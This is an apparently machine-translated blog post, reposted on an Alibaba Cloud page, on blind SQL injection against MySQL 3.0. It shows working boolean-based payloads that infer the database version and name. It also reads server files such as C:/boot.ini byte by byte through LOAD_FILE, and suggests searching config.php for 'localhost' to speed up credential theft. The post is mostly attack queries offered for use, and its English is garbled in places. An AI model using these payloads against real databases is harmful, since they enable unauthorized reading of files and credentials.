A little thought about the injection of MySQL 3.0-vulnerability Research
Source: Internet
Author: User
3.0 injection of MySQL
The injection of MySQL is mainly by union query, but the union is only version 4. More than 0 of the useful, to 3. It's useless to be under 0 ...
So there's no way to use Union for cross table queries in MySQL 3.0 database, but you can use Load_file
But it is not possible to replace it directly with a union. Here's a little bit of my thinking:
Get version:
Mysql> SELECT * from user where userid=1 and length (version ()) <10;
Empty Set (0.00 sec)
Mysql> SELECT * from user where userid=1 and length (version ()) <1777;
+--------+----------+----------+
| UserID | Username | password |
+--------+----------+----------+
| 1 | Angel | Mypass |
+--------+----------+----------+
1 row in Set (0.00 sec)
Get the current database:
Mysql> SELECT * from user where userid=1 and length (Database ()) >0;
+--------+----------+----------+
| UserID | Username | password |
+--------+----------+----------+
| 1 | Angel | Mypass |
+--------+----------+----------+
1 row in Set (0.00 sec)
Seizure file Code:
Mysql> SELECT * from user where userid=1 and ASCII (Mid (Load_file (' C:/boot.ini '), 1,1) <1;
Empty Set (0.05 sec)
Mysql> SELECT * from user where userid=1 and ASCII (Mid (Load_file (' C:/boot.ini '), 1,1) >1;
+--------+----------+----------+
| UserID | Username | password |
+--------+----------+----------+
| 1 | Angel | Mypass |
+--------+----------+----------+
1 row in Set (0.00 sec)
Because of the heavy workload, you can use the program to achieve (but also very troublesome)
Another idea: You can use the character processing function to get "special character position", if we are config.php files we can choose "localhost" (or other) as a special character, first get the location (in which byte), in the vicinity of guessing it, so that can save a lot of work.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.